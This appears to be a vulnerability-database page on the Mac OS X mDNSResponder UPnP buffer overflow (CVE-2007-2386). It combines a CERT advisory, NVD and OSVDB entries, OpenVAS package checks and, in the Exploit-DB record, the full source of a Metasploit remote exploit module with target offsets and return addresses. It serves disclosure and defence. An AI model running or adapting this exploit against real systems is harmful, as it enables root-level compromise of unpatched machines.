Apple Mac OS X mDNSResponder buffer overflow vulnerability
2007-05-25T00:00:00
ID VU:221876 Type cert Reporter CERT Modified 2007-06-20T17:46:00
Description
Overview
Apple Mac OS X mDNSresponder contains a buffer overflow vulnerability that may allow an attacker to execute arbitrary code.
Description
mDNS uses IP multicast with DNS to provide the functionality of a DNS server for service discovery in networks that do not have a DNS server. mDNSResponder uses Multicast DNS Service Discovery for service discovery on the local network segment, and Unicast DNS Service Discovery for service discovery outside of the local network.
Bonjour provides zero-confirguation networking for Apple OS X. mDNSResponder is included as a part of Bonjour and runs as a system service. mDNSResponder is a included in OS X and Apple TV.
mDNSResponder contains a buffer overflow vulnerability. This vulnerability occurs in the UPnP IGD (Internet Gateway Device Standardized Device Control Protocol) code that is used to create dynamic port mappings in consumer routers.
Note that an attacker would need to be able to send multicast packets to a vulnerable system to exploit this vulnerability.
Impact
An attacker may be able to execute arbitrary code with root privileges, or create a denial of service condition.
Solution
Update
Apple has released Security Update 2007-005 to address this issue. Users are encouraged to apply these updates as soon as possible.
Restrict access
Until updates can be applied, creating a firewall rule to restrict access to 5353/udp and 1900/udp may mitigate this vulnerability. See the Apple Support document Creating an Advanced IP Firewall Rule for more information on how to create firewall rules. Note that blocking these ports may cause applications that rely on Bonjour to fail.
Vendor Information
221876
Filter by status: All Affected Not Affected Unknown
Filter by content: __ Additional information available
__ Sort by: Status Alphabetical
Expand all
Javascript is disabled. Click here to view vendors.
Apple Computer, Inc. __ Affected
Updated: May 25, 2007
Status
Affected
Vendor Statement
We have not received a statement from the vendor.
Vendor Information
The vendor has not provided us with any further information regarding this vulnerability.
Addendum
See <http://docs.info.apple.com/article.html?artnum=305530> for more details.
If you have feedback, comments, or additional information about this vulnerability, please send us email.
CVSS Metrics
Group | Score | Vector
---|---|---
Base | |
Temporal | |
Environmental | |
Thanks to Apple for information that was used in this report. Apple thanks Michael Lynn of Juniper Networks for reporting this issue.
This document was written by Ryan Giobbi.
Other Information
CVE IDs: | CVE-2007-2386
---|--- Severity Metric: | 6.09 Date Public: | 2007-05-24 Date First Published: | 2007-05-25 Date Last Updated: | 2007-06-20 17:46 UTC Document Revision: | 14
{"id": "VU:221876", "type": "cert", "bulletinFamily": "info", "title": "Apple Mac OS X mDNSResponder buffer overflow vulnerability", "description": "### Overview \n\nApple Mac OS X mDNSresponder contains a buffer overflow vulnerability that may allow an attacker to execute arbitrary code.\n\n### Description \n\nmDNS uses IP multicast with DNS to provide the functionality of a DNS server for service discovery in networks that do not have a DNS server. mDNSResponder uses Multicast DNS Service Discovery for service discovery on the local network segment, and Unicast DNS Service Discovery for service discovery outside of the local network. \n\n[Bonjour](<http://developer.apple.com/networking/bonjour/faq.html>) provides zero-confirguation networking for Apple OS X. mDNSResponder is included as a part of Bonjour and runs as a system service. mDNSResponder is a included in OS X and Apple TV. \n \nmDNSResponder contains a buffer overflow vulnerability. This vulnerability occurs in the UPnP IGD (Internet Gateway Device Standardized Device Control Protocol) code that is used to create dynamic port mappings in consumer routers. \n \nNote that an attacker would need to be able to send multicast packets to a vulnerable system to exploit this vulnerability. \n \n--- \n \n### Impact \n\nAn attacker may be able to execute arbitrary code with root privileges, or create a denial of service condition. \n \n--- \n \n### Solution \n\n**Update** \nApple has released Security Update [2007-005](<http://docs.info.apple.com/article.html?artnum=305530>) to address this issue. Users are encouraged to apply these updates as soon as possible. \n \n--- \n \n \n**Restrict access** \n \nUntil updates can be applied, creating a firewall rule to restrict access to `5353/udp` and `1900/udp` may mitigate this vulnerability. See the Apple Support document [Creating an Advanced IP Firewall Rule](<http://docs.info.apple.com/article.html?path=ServerAdmin/10.4/en/c4ns11.html>) for more information on how to create firewall rules. Note that blocking these ports may cause applications that rely on Bonjour to fail. \n \n--- \n \n### Vendor Information\n\n221876\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer, Inc. __ Affected\n\nUpdated: May 25, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://docs.info.apple.com/article.html?artnum=305530> for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23221876 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://docs.info.apple.com/article.html?artnum=305530>\n * <http://developer.apple.com/networking/bonjour/faq.html>\n * <http://docs.info.apple.com/article.html?path=ServerAdmin/10.4/en/c4ns11.html>\n * <http://www.apple.com/appletv/>\n * <http://www.iss.net/threats/264.html>\n * <http://www.upnp.org/standardizeddcps/igd.asp>\n * <http://en.wikipedia.org/wiki/IP_Multicast>\n * <http://docs.info.apple.com/article.html?artnum=305631>\n\n### Acknowledgements\n\nThanks to Apple for information that was used in this report. Apple thanks Michael Lynn of Juniper Networks for reporting this issue.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-2386](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-2386>) \n---|--- \n**Severity Metric:** | 6.09 \n**Date Public:** | 2007-05-24 \n**Date First Published:** | 2007-05-25 \n**Date Last Updated: ** | 2007-06-20 17:46 UTC \n**Document Revision: ** | 14 \n", "published": "2007-05-25T00:00:00", "modified": "2007-06-20T17:46:00", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:C"}, "href": "https://www.kb.cert.org/vuls/id/221876", "reporter": "CERT", "references": ["http://docs.info.apple.com/article.html?artnum=305530", "http://developer.apple.com/networking/bonjour/faq.html", "http://docs.info.apple.com/article.html?path=ServerAdmin/10.4/en/c4ns11.html", "http://www.apple.com/appletv/", "http://www.iss.net/threats/264.html", "http://www.upnp.org/standardizeddcps/igd.asp", "http://en.wikipedia.org/wiki/IP_Multicast", "http://docs.info.apple.com/article.html?artnum=305631"], "cvelist": ["CVE-2007-2386"], "lastseen": "2020-09-18T20:42:39", "viewCount": 2, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2020-09-18T20:42:39", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2386"]}, {"type": "osvdb", "idList": ["OSVDB:35142"]}, {"type": "exploitdb", "idList": ["EDB-ID:16871"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/OSX/MDNS/UPNP_LOCATION"]}, {"type": "gentoo", "idList": ["GLSA-201201-05"]}, {"type": "openvas", "idList": ["OPENVAS:70806", "OPENVAS:136141256231070806"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201201-05.NASL", "MACOSX_SECUPD2007-005.NASL"]}], "modified": "2020-09-18T20:42:39", "rev": 2}, "vulnersScore": 7.3}}
{"cve": [{"lastseen": "2021-02-02T05:31:23", "description": "Buffer overflow in mDNSResponder in Apple Mac OS X 10.4 up to 10.4.9 allows remote attackers to cause a denial of service (application termination) or execute arbitrary code via a crafted UPnP Internet Gateway Device (IGD) packet.", "edition": 4, "cvss3": {}, "published": "2007-05-24T22:30:00", "title": "CVE-2007-2386", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 9.4, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-2386"], "modified": "2017-07-29T01:31:00", "cpe": ["cpe:/o:apple:mac_os_x:10.4.3", "cpe:/o:apple:mac_os_x:10.4.8", "cpe:/o:apple:mac_os_x:10.4", "cpe:/o:apple:mac_os_x:10.4.1", "cpe:/o:apple:mac_os_x:10.4.2", "cpe:/o:apple:mac_os_x:10.4.6", "cpe:/o:apple:mac_os_x:10.4.7", "cpe:/o:apple:mac_os_x:10.4.5", "cpe:/o:apple:mac_os_x:10.4.4"], "id": "CVE-2007-2386", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2386", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:C"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.4:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.4.3:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "cvelist": ["CVE-2007-2386"], "description": "## Vulnerability Description\nA buffer overflow exists in Mac OS X. The mDNSResponder fails to validate UPnP packets used by the Internet Gateway Daemon resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Apple has released a patch to address this vulnerability.\n## Short Description\nA buffer overflow exists in Mac OS X. The mDNSResponder fails to validate UPnP packets used by the Internet Gateway Daemon resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=305631)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=305530)\nSecurity Tracker: 1018123\n[Secunia Advisory ID:25402](https://secuniaresearch.flexerasoftware.com/advisories/25402/)\n[Secunia Advisory ID:25745](https://secuniaresearch.flexerasoftware.com/advisories/25745/)\n[Related OSVDB ID: 35141](https://vulners.com/osvdb/OSVDB:35141)\n[Related OSVDB ID: 35143](https://vulners.com/osvdb/OSVDB:35143)\n[Related OSVDB ID: 35145](https://vulners.com/osvdb/OSVDB:35145)\n[Related OSVDB ID: 35147](https://vulners.com/osvdb/OSVDB:35147)\n[Related OSVDB ID: 35146](https://vulners.com/osvdb/OSVDB:35146)\n[Related OSVDB ID: 35144](https://vulners.com/osvdb/OSVDB:35144)\nNews Article: http://www.eweek.com/article2/0,1895,2138304,00.asp\nMail List Post: http://lists.apple.com/archives/security-announce/2007/May/msg00004.html\nISS X-Force ID: 34493\nFrSIRT Advisory: ADV-2007-1939\n[CVE-2007-2386](https://vulners.com/cve/CVE-2007-2386)\nCERT VU: 221876\nBugtraq ID: 24144\n", "edition": 1, "modified": "2007-05-25T11:33:50", "published": "2007-05-25T11:33:50", "href": "https://vulners.com/osvdb/OSVDB:35142", "id": "OSVDB:35142", "title": "Mac OS X mDNSResponder UPnP Internet Gateway Device (IGD) Packet Remote Overflow", "type": "osvdb", "cvss": {"score": 9.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T06:42:56", "description": "Mac OS X mDNSResponder UPnP Location Overflow. CVE-2007-2386. Remote exploit for osx platform", "published": "2011-01-08T00:00:00", "type": "exploitdb", "title": "Mac OS X mDNSResponder UPnP Location Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2386"], "modified": "2011-01-08T00:00:00", "id": "EDB-ID:16871", "href": "https://www.exploit-db.com/exploits/16871/", "sourceData": "##\r\n# $Id: upnp_location.rb 11515 2011-01-08 01:12:15Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Mac OS X mDNSResponder UPnP Location Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow that occurs when processing\r\n\t\t\t\tspecially crafted requests set to mDNSResponder. All Mac OS X systems\r\n\t\t\t\tbetween version 10.4 and 10.4.9 (without the 2007-005 patch) are\r\n\t\t\t\taffected.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ddz'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 11515 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '35142' ],\r\n\t\t\t\t\t[ 'CVE', '2007-2386' ],\r\n\t\t\t\t\t[ 'BID', '24144' ],\r\n\t\t\t\t\t[ 'URL', 'http://support.apple.com/kb/TA24732' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'SRVPORT' => 1900,\r\n\t\t\t\t\t'RPORT' => 0\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x2f\",\r\n\t\t\t\t\t'StackAdjustment' => 0,\r\n\t\t\t\t\t'Space' => 468\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'osx',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ '10.4.8 x86',\r\n\t\t\t\t\t\t{ # mDNSResponder-108.2\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t# Offset to mDNSStorage structure\r\n\t\t\t\t\t\t\t'Offset' => 21000,\r\n\t\t\t\t\t\t\t'Magic' => 0x8fe510a0,\r\n\t\t\t\t\t\t\t'g_szRouterHostPortDesc' => 0x53dc0,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ '10.4.0 PPC',\r\n\t\t\t\t\t\t{ # mDNSResponder-107\r\n\t\t\t\t\t\t\t'Arch' => ARCH_PPC,\r\n\t\t\t\t\t\t\t'Offset' => 21000,\r\n\t\t\t\t\t\t\t'Magic' => 0x8fe51f4c,\r\n\t\t\t\t\t\t\t'Ret' => 0x8fe41af8,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'May 25 2007',\r\n\t\t\t'DefaultTarget' => 1))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::LHOST(),\r\n\t\t\t\tOptPort.new('SRVPORT', [ true, \"The UPNP server port to listen on\", 1900 ])\r\n\t\t\t], self.class)\r\n\r\n\t\t@mutex = Mutex.new()\r\n\t\t@found_upnp_port = false\r\n\t\t@key_to_port = Hash.new()\r\n\t\t@upnp_port = 0\r\n\t\t@client_socket = nil\r\n\tend\r\n\r\n\tdef check\r\n\t\t#\r\n\t\t# TODO: Listen on two service ports, one a single character\r\n\t\t# shorter than the other (i.e 1900 and 19000). If the copy was\r\n\t\t# truncated by strlcpy, it will connect to the service listening\r\n\t\t# on the shorter port number.\r\n\t\t#\r\n\t\tupnp_port = scan_for_upnp_port()\r\n\t\tif (upnp_port > 0)\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCode::Unsupported\r\n\t\tend\r\n\tend\r\n\r\n\tdef upnp_server(server)\r\n\t\tclient = server.accept()\r\n\t\trequest = client.readline()\r\n\t\tif (request =~ /GET \\/([\\da-f]+).xml/)\r\n\t\t\t@mutex.synchronize {\r\n\t\t\t\t@found_upnp_port = true\r\n\t\t\t\t@upnp_port = @key_to_port[$1]\r\n\r\n\t\t\t\t# Important: Keep the client connection open\r\n\t\t\t\t@client_socket = client\r\n\t\t\t}\r\n\t\tend\r\n\tend\r\n\r\n\tdef scan_for_upnp_port\r\n\t\t@upnp_port = 0\r\n\t\t@found_upnp_port = false\r\n\r\n\t\tupnp_port = 0\r\n\r\n\t\t# XXX: Do this in a more Metasploit-y way\r\n\t\tserver = TCPServer.open(1900)\r\n\t\tserver_thread = framework.threads.spawn(\"Module(#{self.refname})-Listener\", false) { self.upnp_server(server) }\r\n\r\n\t\tbegin\r\n\t\t\tsocket = Rex::Socket.create_udp\r\n\r\n\t\t\tupnp_location = \"http://\" + datastore['LHOST'] + \":\" + datastore['SRVPORT']\r\n\r\n\t\t\tputs \"[*] Listening for UPNP requests on: #{upnp_location}\"\r\n\t\t\tputs \"[*] Sending UPNP Discovery replies...\"\r\n\r\n\t\t\ti = 49152;\r\n\t\t\twhile i < 65536 && @mutex.synchronize {\r\n\t\t\t\t@found_upnp_port == false\r\n\t\t\t}\r\n\t\t\tkey = sprintf(\"%.2x%.2x%.2x%.2x%.2x\",\r\n\t\t\t\trand(255), rand(255), rand(255), rand(255), rand(255))\r\n\r\n\t\t\t@mutex.synchronize {\r\n\t\t\t\t@key_to_port[key] = i\r\n\t\t\t}\r\n\r\n\t\t\tupnp_reply = \"HTTP/1.1 200 Ok\\r\\n\" +\r\n\t\t\t\t\"ST: urn:schemas-upnp-org:service:WANIPConnection:1\\r\\n\" +\r\n\t\t\t\t\"USN: uuid:7076436f-6e65-1063-8074-0017311c11d4\\r\\n\" +\r\n\t\t\t\t\"Location: #{upnp_location}/#{key}.xml\\r\\n\\r\\n\"\r\n\r\n\t\t\tsocket.sendto(upnp_reply, datastore['RHOST'], i)\r\n\r\n\t\t\ti += 1\r\n\t\tend\r\n\r\n\t\t@mutex.synchronize {\r\n\t\t\tif (@found_upnp_port)\r\n\t\t\t\tupnp_port = @upnp_port\r\n\t\t\tend\r\n\t\t}\r\n\t\tensure\r\n\t\t\tserver.close\r\n\t\t\tserver_thread.join\r\n\t\tend\r\n\r\n\t\treturn upnp_port\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t#\r\n\t\t# It is very important that we scan for the upnp port. We must\r\n\t\t# receive the TCP connection and hold it open, otherwise the\r\n\t\t# code path that uses the overwritten function pointer most\r\n\t\t# likely won't be used. Holding this connection increases the\r\n\t\t# chance that the code path will be used dramatically.\r\n\t\t#\r\n\t\tupnp_port = scan_for_upnp_port()\r\n\r\n\t\tif upnp_port == 0\r\n\t\t\traise \"Could not find listening UPNP UDP socket\"\r\n\t\tend\r\n\r\n\t\tdatastore['RPORT'] = upnp_port\r\n\r\n\t\tsocket = connect_udp()\r\n\r\n\t\tif (target['Arch'] == ARCH_X86)\r\n\t\t\tspace = \"A\" * target['Offset']\r\n\t\t\tspace[0, payload.encoded.length] = payload.encoded\r\n\r\n\t\t\tpattern = Rex::Text.pattern_create(47)\r\n\t\t\tpattern[20, 4] = [target['Magic']].pack('V')\r\n\t\t\tpattern[44, 3] = [target['g_szRouterHostPortDesc']].pack('V')[0..2]\r\n\r\n\t\t\tboom = space + pattern\r\n\t\t\tusn = \"\"\r\n\r\n\t\telsif (target['Arch'] == ARCH_PPC)\r\n\t\t\tspace = \"A\" * target['Offset']\r\n\r\n\t\t\tpattern = Rex::Text.pattern_create(48)\r\n\t\t\tpattern[20, 4] = [target['Magic']].pack('N')\r\n\r\n\t\t\t#\r\n\t\t\t# r26, r27, r30, r31 point to g_szUSN+556\r\n\t\t\t# Ret should be a branch to one of these registers\r\n\t\t\t# And we make sure to put our payload in the USN header\r\n\t\t\t#\r\n\t\t\tpattern[44, 4] = [target['Ret']].pack('N')\r\n\r\n\t\t\tboom = space + pattern\r\n\r\n\t\t\t#\r\n\t\t\t# Start payload at offset 556 within USN\r\n\t\t\t#\r\n\t\t\tusn = \"A\" * 556 + payload.encoded\r\n\t\tend\r\n\r\n\t\tupnp_reply = \"HTTP/1.1 200 Ok\\r\\n\" +\r\n\t\t\t\"ST: urn:schemas-upnp-org:service:WANIPConnection:1\\r\\n\" +\r\n\t\t\t\"USN: #{usn}\\r\\n\" +\r\n\t\t\t\"Location: http://#{boom}\\r\\n\\r\\n\"\r\n\r\n\t\tputs \"[*] Sending evil UPNP response\"\r\n\t\tsocket.put(upnp_reply)\r\n\r\n\t\tputs \"[*] Sleeping to give mDNSDaemonIdle() a chance to run\"\r\n\t\tselect(nil,nil,nil,10)\r\n\r\n\t\thandler()\r\n\t\tdisconnect_udp()\r\n\tend\r\nend\r\n", "cvss": {"score": 9.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16871/"}], "metasploit": [{"lastseen": "2020-10-06T05:35:46", "description": "This module exploits a buffer overflow that occurs when processing specially crafted requests set to mDNSResponder. All Mac OS X systems between version 10.4 and 10.4.9 (without the 2007-005 patch) are affected.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Mac OS X mDNSResponder UPnP Location Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2386"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/OSX/MDNS/UPNP_LOCATION", "href": "", "sourceData": "", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/mdns/upnp_location.rb"}], "openvas": [{"lastseen": "2019-05-29T18:38:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0989", "CVE-2008-3630", "CVE-2007-3744", "CVE-2007-2386", "CVE-2008-2326", "CVE-2007-3828"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201201-05.", "modified": "2018-10-12T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:136141256231070806", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070806", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201201-05 (mDNSResponder)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201201_05.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70806\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2007-2386\", \"CVE-2007-3744\", \"CVE-2007-3828\", \"CVE-2008-0989\", \"CVE-2008-2326\", \"CVE-2008-3630\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:42 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201201-05 (mDNSResponder)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been found in mDNSResponder, which\n could lead to execution of arbitrary code with root privileges.\");\n script_tag(name:\"solution\", value:\"All mDNSResponder users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/mDNSResponder-212.1'\n\n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are\n available since November 21, 2009. It is likely that your system is\n already no longer affected by this issue.\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201201-05\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=290822\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201201-05.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"net-misc/mDNSResponder\", unaffected: make_list(\"ge 212.1\"), vulnerable: make_list(\"lt 212.1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0989", "CVE-2008-3630", "CVE-2007-3744", "CVE-2007-2386", "CVE-2008-2326", "CVE-2007-3828"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201201-05.", "modified": "2017-07-07T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:70806", "href": "http://plugins.openvas.org/nasl.php?oid=70806", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201201-05 (mDNSResponder)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been found in mDNSResponder, which\n could lead to execution of arbitrary code with root privileges.\";\ntag_solution = \"All mDNSResponder users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/mDNSResponder-212.1'\n \n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are\n available since November 21, 2009. It is likely that your system is\n already no longer affected by this issue.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201201-05\nhttp://bugs.gentoo.org/show_bug.cgi?id=290822\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201201-05.\";\n\n \n \nif(description)\n{\n script_id(70806);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2007-2386\", \"CVE-2007-3744\", \"CVE-2007-3828\", \"CVE-2008-0989\", \"CVE-2008-2326\", \"CVE-2008-3630\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:42 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201201-05 (mDNSResponder)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"net-misc/mDNSResponder\", unaffected: make_list(\"ge 212.1\"), vulnerable: make_list(\"lt 212.1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": 